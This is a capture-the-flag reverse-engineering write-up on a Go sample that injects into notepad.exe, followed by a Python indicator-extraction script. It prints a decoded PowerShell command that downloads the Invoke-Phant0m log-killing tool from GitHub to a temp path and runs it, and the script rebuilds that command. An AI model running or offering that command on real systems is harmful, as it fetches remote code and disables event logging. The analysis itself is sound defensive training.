Reverse Engineering - Another Injection
Good morning everyone XD
Don’t ignore the warning .-.
What language is the program written in? (1 point)
You can use IDA or PE Studio. This time I will use IDA, so I will walk you through downloading and using IDA Pro.
Please import the file and go to the Hex View-1
Go lang
What is the build id? (1 point)
eck19EyXq_9c975RxNJ1/QkbhfvYWoTcAeJreFwhX/q3HwQW17YdD3iMlLFCzB/1ZpNy-9ah0QEvzlOTFcq
What is the dependency package the sample uses for invoking Windows APIs? (1 point)
yes, that’s it .-.
github.com/TheTitanrain/w32
What is the victim process? (Hint: 32bit) (2 points)
Easy, right? :)
Nooooooo!!! It took me all day just to realize it needs to launch itself or be injected. Yes, the challenge title ;))))))))
strings main.exe | grep .exe
notepad.exe
What is the process invoked from the shellcode? (1 point)
What do you think: shellcode -> powershell?
too fast XD
strings main.exe | grep powershell
powershell
What is the name of the created file? (2 points)
Go ahead, let's decode it in CyberChef.
Now just remove the spaces
Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/master/Invoke-Phant0m.ps1" -OutFile "C:\Windows\Temp\change.ps1"; Import-Module C:\Windows\Temp\change.ps1;Invoke-Phant0m;
OK, got the answer ~
C:\Windows\Temp\change.ps1
What is the name of the actual tool executed? (2 points)
Invoke-Phant0m
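As an added example (this is not code from the writeup or from the challenge), here is a small Python triage script that automates the manual steps above: it pulls ASCII and UTF-16LE strings out of a binary the way `strings` did, base64-decodes any long blob it finds the way CyberChef did, and then collects the process names, dropped-file paths, URLs and Invoke-* cmdlets a defender would want from the result. The sample bytes are constructed here, not taken from main.exe: the base64 blob is built from the decoded command shown on this page, encoded as UTF-16LE, which is my assumption about why CyberChef showed a "space" between every letter (PowerShell expects UTF-16LE for encoded commands, and the zero bytes render as spaces or dots).

```python
import base64
import binascii
import re

# --- Constructed sample, NOT bytes from the challenge binary -----------------
# COMMAND is the decoded command shown in the writeup. The other strings stand
# in for what `strings main.exe` surfaced (an ASCII and a wide copy of the
# victim process name, since a Windows CreateProcessW call takes UTF-16LE).
COMMAND = (
    'Invoke-WebRequest "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/'
    'master/Invoke-Phant0m.ps1" -OutFile "C:\\Windows\\Temp\\change.ps1"; '
    'Import-Module C:\\Windows\\Temp\\change.ps1;Invoke-Phant0m;'
)
# Assumption: the blob in the binary is base64 over UTF-16LE text.
ENCODED = base64.b64encode(COMMAND.encode("utf-16le")).decode("ascii")
SAMPLE = (
    b"\x00\x01\x7f" + b"notepad.exe\x00" + b"\x90\x90\xcc"
    + b"powershell \x00" + ENCODED.encode("ascii") + b"\x00\xff"
    + "notepad.exe".encode("utf-16le") + b"\x00\x00"
)

# Printable ASCII runs, and printable runs where every character is followed
# by a zero byte (UTF-16LE), both at least four characters long like `strings`.
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
# A base64 candidate: long alphabet run plus optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def ascii_strings(data: bytes) -> list[str]:
    return [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]


def wide_strings(data: bytes) -> list[str]:
    return [m.group().decode("utf-16le") for m in WIDE_RE.finditer(data)]


def decode_candidate(blob: str):
    """Base64-decode one candidate and return readable text, or None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        # Every odd byte is zero: this is UTF-16LE. Decoding it properly is
        # the "remove the spaces" step, done without dropping real characters.
        return raw.decode("utf-16le")
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def triage(data: bytes) -> dict:
    """Collect the indicators the challenge questions ask for."""
    found = ascii_strings(data) + wide_strings(data)
    decoded = [
        d for s in found for d in map(decode_candidate, B64_RE.findall(s)) if d
    ]
    processes = {m.lower() for s in found for m in re.findall(r"[\w-]+\.exe", s, re.I)}
    paths = {p for d in decoded for p in re.findall(r"[A-Za-z]:\\[^\s\";]+", d)}
    urls = {u for d in decoded for u in re.findall(r"https?://[^\s\"]+", d)}
    # Heuristic: any Invoke-* cmdlet other than the downloader is the tool.
    tools = {
        t for d in decoded for t in re.findall(r"Invoke-\w+", d)
        if t != "Invoke-WebRequest"
    }
    return {
        "processes": sorted(processes),
        "powershell": any("powershell" in s.lower() for s in found),
        "decoded_commands": decoded,
        "dropped_files": sorted(paths),
        "urls": sorted(urls),
        "tools": sorted(tools),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `triage`; the wide-string pass matters because GNU `strings` only shows UTF-16LE text when you add `-e l`, so a `grep .exe` over the default output can miss the process name.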
Goodbye, and thank you for reading until now //~//